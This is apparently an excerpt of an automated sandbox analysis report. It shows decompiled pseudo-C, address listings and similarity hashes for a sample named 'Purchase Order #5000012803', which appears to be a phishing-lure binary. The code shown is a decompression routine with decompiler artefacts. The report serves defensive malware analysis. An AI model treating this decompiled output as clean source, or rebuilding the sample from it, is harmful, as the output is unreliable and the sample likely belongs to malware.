                      												goto L170;
                      											}
                      											L57:
                      											__ecx =  *(__ebp - 0x68);
                      											__al =  *(__ebp - 0x5c);
                      											__edx =  *(__ebp - 8);
                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      											 *( *(__ebp - 0x68)) = __al;
                      											__ecx =  *(__ebp - 0x14);
                      											 *(__ecx +  *(__ebp - 8)) = __al;
                      											__eax = __ecx + 1;
                      											__edx = 0;
                      											_t192 = __eax %  *(__ebp - 0x74);
                      											__eax = __eax /  *(__ebp - 0x74);
                      											__edx = _t192;
                      											goto L80;
                      										case 0x1b:
                      											L76:
                      											__eflags =  *(__ebp - 0x64);
                      											if( *(__ebp - 0x64) == 0) {
                      												L163:
                      												 *(__ebp - 0x88) = 0x1b;
                      												goto L170;
                      											}
                      											L77:
                      											__eax =  *(__ebp - 0x14);
                      											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      											__eflags = __eax -  *(__ebp - 0x74);
                      											if(__eax >=  *(__ebp - 0x74)) {
                      												__eax = __eax +  *(__ebp - 0x74);
                      												__eflags = __eax;
                      											}
                      											__edx =  *(__ebp - 8);
                      											__cl =  *(__eax + __edx);
                      											__eax =  *(__ebp - 0x14);
                      											 *(__ebp - 0x5c) = __cl;
                      											 *(__eax + __edx) = __cl;
                      											__eax = __eax + 1;
                      											__edx = 0;
                      											_t275 = __eax %  *(__ebp - 0x74);
                      											__eax = __eax /  *(__ebp - 0x74);
                      											__edx = _t275;
                      											__eax =  *(__ebp - 0x68);
                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      											_t284 = __ebp - 0x64;
                      											 *_t284 =  *(__ebp - 0x64) - 1;
                      											__eflags =  *_t284;
                      											 *( *(__ebp - 0x68)) = __cl;
                      											L80:
                      											 *(__ebp - 0x14) = __edx;
                      											goto L81;
                      										case 0x1c:
                      											while(1) {
                      												L123:
                      												__eflags =  *(__ebp - 0x64);
                      												if( *(__ebp - 0x64) == 0) {
                      													break;
                      												}
                      												L124:
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
                      													__eflags = __eax;
                      												}
                      												__edx =  *(__ebp - 8);
                      												__cl =  *(__eax + __edx);
                      												__eax =  *(__ebp - 0x14);
                      												 *(__ebp - 0x5c) = __cl;
                      												 *(__eax + __edx) = __cl;
                      												__eax = __eax + 1;
                      												__edx = 0;
                      												_t414 = __eax %  *(__ebp - 0x74);
                      												__eax = __eax /  *(__ebp - 0x74);
                      												__edx = _t414;
                      												__eax =  *(__ebp - 0x68);
                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                      												__eflags =  *(__ebp - 0x30);
                      												 *( *(__ebp - 0x68)) = __cl;
                      												 *(__ebp - 0x14) = _t414;
                      												if( *(__ebp - 0x30) > 0) {
                      													continue;
                      												} else {
                      													L127:
                      													L81:
                      													 *(__ebp - 0x88) = 2;
                      													goto L1;
                      												}
                      											}
                      											L167:
                      											 *(__ebp - 0x88) = 0x1c;
                      											goto L170;
                      									}
                      								}
                      								L171:
                      								_t539 = _t538 | 0xffffffff;
                      								goto L172;
                      							}
                      						}
                      					}
                      				}
                      			}















                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00406343
                      0x00406343
                      0x00406346
                      0x00000000
                      0x00000000
                      0x00406682
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00406688
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x0040678a
                      0x00406745
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406830
                      0x00406833
                      0x00406734
                      0x00406734
                      0x00406734
                      0x00000000
                      0x0040673a
                      0x00000000
                      0x0040646a
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x0040678a
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004064af
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x00406548
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00406734
                      0x004067b4
                      0x0040677d

                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                      • Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
                      • Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                      • Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E00406682() {
                      				void _t533;
                      				signed int _t534;
                      				signed int _t535;
                      				signed int* _t605;
                      				void* _t612;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					if( *(_t612 - 0x40) != 0) {
                      						 *(_t612 - 0x84) = 0x13;
                      						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                      						goto L132;
                      					} else {
                      						__eax =  *(__ebp - 0x4c);
                      						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                      						__ecx =  *(__ebp - 0x58);
                      						__eax =  *(__ebp - 0x4c) << 4;
                      						__eax =  *(__ebp - 0x58) + __eax + 4;
                      						L130:
                      						 *(__ebp - 0x58) = __eax;
                      						 *(__ebp - 0x40) = 3;
                      						L144:
                      						 *(__ebp - 0x7c) = 0x14;
                      						L145:
                      						__eax =  *(__ebp - 0x40);
                      						 *(__ebp - 0x50) = 1;
                      						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                      						L149:
                      						if( *(__ebp - 0x48) <= 0) {
                      							__ecx =  *(__ebp - 0x40);
                      							__ebx =  *(__ebp - 0x50);
                      							0 = 1;
                      							__eax = 1 << __cl;
                      							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                      							__eax =  *(__ebp - 0x7c);
                      							 *(__ebp - 0x44) = __ebx;
                      							while(1) {
                      								L140:
                      								 *(_t612 - 0x88) = _t533;
                      								while(1) {
                      									L1:
                      									_t534 =  *(_t612 - 0x88);
                      									if(_t534 > 0x1c) {
                      										break;
                      									}
                      									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                      										case 0:
                      											if( *(_t612 - 0x6c) == 0) {
                      												goto L170;
                      											}
                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                      											_t534 =  *( *(_t612 - 0x70));
                      											if(_t534 > 0xe1) {
                      												goto L171;
                      											}
                      											_t538 = _t534 & 0x000000ff;
                      											_push(0x2d);
                      											asm("cdq");
                      											_pop(_t569);
                      											_push(9);
                      											_pop(_t570);
                      											_t608 = _t538 / _t569;
                      											_t540 = _t538 % _t569 & 0x000000ff;
                      											asm("cdq");
                      											_t603 = _t540 % _t570 & 0x000000ff;
                      											 *(_t612 - 0x3c) = _t603;
                      											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                      											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                      											_t611 = (0x300 << _t603 + _t608) + 0x736;
                      											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                      												L10:
                      												if(_t611 == 0) {
                      													L12:
                      													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                      													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                      													goto L15;
                      												} else {
                      													goto L11;
                      												}
                      												do {
                      													L11:
                      													_t611 = _t611 - 1;
                      													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                      												} while (_t611 != 0);
                      												goto L12;
                      											}
                      											if( *(_t612 - 4) != 0) {
                      												GlobalFree( *(_t612 - 4));
                      											}
                      											_t534 = GlobalAlloc(0x40, 0x600); // executed
                      											 *(_t612 - 4) = _t534;
                      											if(_t534 == 0) {
                      												goto L171;
                      											} else {
                      												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                      												goto L10;
                      											}
                      										case 1:
                      											L13:
                      											__eflags =  *(_t612 - 0x6c);
                      											if( *(_t612 - 0x6c) == 0) {
                      												 *(_t612 - 0x88) = 1;
                      												goto L170;
                      											}
                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                      											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                      											_t45 = _t612 - 0x48;
                      											 *_t45 =  *(_t612 - 0x48) + 1;
                      											__eflags =  *_t45;
                      											L15:
                      											if( *(_t612 - 0x48) < 4) {
                      												goto L13;
                      											}
                      											_t546 =  *(_t612 - 0x40);
                      											if(_t546 ==  *(_t612 - 0x74)) {
                      												L20:
                      												 *(_t612 - 0x48) = 5;
                      												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                      												goto L23;
                      											}
                      											 *(_t612 - 0x74) = _t546;
                      											if( *(_t612 - 8) != 0) {
                      												GlobalFree( *(_t612 - 8));
                      											}
                      											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                      											 *(_t612 - 8) = _t534;
                      											if(_t534 == 0) {
                      												goto L171;
                      											} else {
                      												goto L20;
                      											}
                      										case 2:
                      											L24:
                      											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                      											 *(_t612 - 0x84) = 6;
                      											 *(_t612 - 0x4c) = _t553;
                      											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                      											goto L132;
                      										case 3:
                      											L21:
                      											__eflags =  *(_t612 - 0x6c);
                      											if( *(_t612 - 0x6c) == 0) {
                      												 *(_t612 - 0x88) = 3;
                      												goto L170;
                      											}
                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                      											_t67 = _t612 - 0x70;
                      											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                      											__eflags =  *_t67;
                      											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                      											L23:
                      											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                      											if( *(_t612 - 0x48) != 0) {
                      												goto L21;
                      											}
                      											goto L24;
                      										case 4:
                      											L133:
                      											_t531 =  *_t605;
                      											_t588 = _t531 & 0x0000ffff;
                      											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                      											if( *(_t612 - 0xc) >= _t564) {
                      												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                      												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                      												 *(_t612 - 0x40) = 1;
                      												_t532 = _t531 - (_t531 >> 5);
                      												__eflags = _t532;
                      												 *_t605 = _t532;
                      											} else {
                      												 *(_t612 - 0x10) = _t564;
                      												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                      												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                      											}
                      											if( *(_t612 - 0x10) >= 0x1000000) {
                      												goto L139;
                      											} else {
                      												goto L137;
                      											}
                      										case 5:
                      											L137:
                      											if( *(_t612 - 0x6c) == 0) {
                      												 *(_t612 - 0x88) = 5;
                      												goto L170;
                      											}
                      											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                      											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                      											L139:
                      											_t533 =  *(_t612 - 0x84);
                      											goto L140;
                      										case 6:
                      											__edx = 0;
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x34) = 1;
                      												 *(__ebp - 0x84) = 7;
                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                      												goto L132;
                      											}
                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      											__esi =  *(__ebp - 0x60);
                      											__cl = 8;
                      											__cl = 8 -  *(__ebp - 0x3c);
                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      											__ecx =  *(__ebp - 0x3c);
                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      											__ecx =  *(__ebp - 4);
                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      											__eflags =  *(__ebp - 0x38) - 4;
                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      											if( *(__ebp - 0x38) >= 4) {
                      												__eflags =  *(__ebp - 0x38) - 0xa;
                      												if( *(__ebp - 0x38) >= 0xa) {
                      													_t98 = __ebp - 0x38;
                      													 *_t98 =  *(__ebp - 0x38) - 6;
                      													__eflags =  *_t98;
                      												} else {
                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      												}
                      											} else {
                      												 *(__ebp - 0x38) = 0;
                      											}
                      											__eflags =  *(__ebp - 0x34) - __edx;
                      											if( *(__ebp - 0x34) == __edx) {
                      												__ebx = 0;
                      												__ebx = 1;
                      												goto L61;
                      											} else {
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
                      													__eflags = __eax;
                      												}
                      												__ecx =  *(__ebp - 8);
                      												__ebx = 0;
                      												__ebx = 1;
                      												__al =  *((intOrPtr*)(__eax + __ecx));
                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      												goto L41;
                      											}
                      										case 7:
                      											__eflags =  *(__ebp - 0x40) - 1;
                      											if( *(__ebp - 0x40) != 1) {
                      												__eax =  *(__ebp - 0x24);
                      												 *(__ebp - 0x80) = 0x16;
                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      												__eax =  *(__ebp - 0x28);
                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      												__eax =  *(__ebp - 0x2c);
                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      												__al = __al & 0x000000fd;
                      												__eax = (__eflags >= 0) - 1 + 0xa;
                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                      												__eax =  *(__ebp - 4);
                      												__eax =  *(__ebp - 4) + 0x664;
                      												__eflags = __eax;
                      												 *(__ebp - 0x58) = __eax;
                      												goto L69;
                      											}
                      											__eax =  *(__ebp - 4);
                      											__ecx =  *(__ebp - 0x38);
                      											 *(__ebp - 0x84) = 8;
                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                      											goto L132;
                      										case 8:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x84) = 0xa;
                      												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                      											} else {
                      												__eax =  *(__ebp - 0x38);
                      												__ecx =  *(__ebp - 4);
                      												__eax =  *(__ebp - 0x38) + 0xf;
                      												 *(__ebp - 0x84) = 9;
                      												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                      											}
                      											goto L132;
                      										case 9:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												goto L90;
                      											}
                      											__eflags =  *(__ebp - 0x60);
                      											if( *(__ebp - 0x60) == 0) {
                      												goto L171;
                      											}
                      											__eax = 0;
                      											__eflags =  *(__ebp - 0x38) - 7;
                      											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                      											__eflags = _t259;
                      											0 | _t259 = _t259 + _t259 + 9;
                      											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                      											goto L76;
                      										case 0xa:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x84) = 0xb;
                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                      												goto L132;
                      											}
                      											__eax =  *(__ebp - 0x28);
                      											goto L89;
                      										case 0xb:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__ecx =  *(__ebp - 0x24);
                      												__eax =  *(__ebp - 0x20);
                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      											} else {
                      												__eax =  *(__ebp - 0x24);
                      											}
                      											__ecx =  *(__ebp - 0x28);
                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      											L89:
                      											__ecx =  *(__ebp - 0x2c);
                      											 *(__ebp - 0x2c) = __eax;
                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      											L90:
                      											__eax =  *(__ebp - 4);
                      											 *(__ebp - 0x80) = 0x15;
                      											__eax =  *(__ebp - 4) + 0xa68;
                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                      											goto L69;
                      										case 0xc:
                      											L100:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xc;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t335 = __ebp - 0x70;
                      											 *_t335 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t335;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											__eax =  *(__ebp - 0x2c);
                      											goto L102;
                      										case 0xd:
                      											L37:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xd;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t122 = __ebp - 0x70;
                      											 *_t122 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t122;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L39:
                      											__eax =  *(__ebp - 0x40);
                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      												goto L48;
                      											}
                      											__eflags = __ebx - 0x100;
                      											if(__ebx >= 0x100) {
                      												goto L54;
                      											}
                      											L41:
                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      											__ecx =  *(__ebp - 0x58);
                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      											 *(__ebp - 0x48) = __eax;
                      											__eax = __eax + 1;
                      											__eax = __eax << 8;
                      											__eax = __eax + __ebx;
                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      											__ax =  *__esi;
                      											 *(__ebp - 0x54) = __esi;
                      											__edx = __ax & 0x0000ffff;
                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      											__eflags =  *(__ebp - 0xc) - __ecx;
                      											if( *(__ebp - 0xc) >= __ecx) {
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      												__cx = __ax;
                      												 *(__ebp - 0x40) = 1;
                      												__cx = __ax >> 5;
                      												__eflags = __eax;
                      												__ebx = __ebx + __ebx + 1;
                      												 *__esi = __ax;
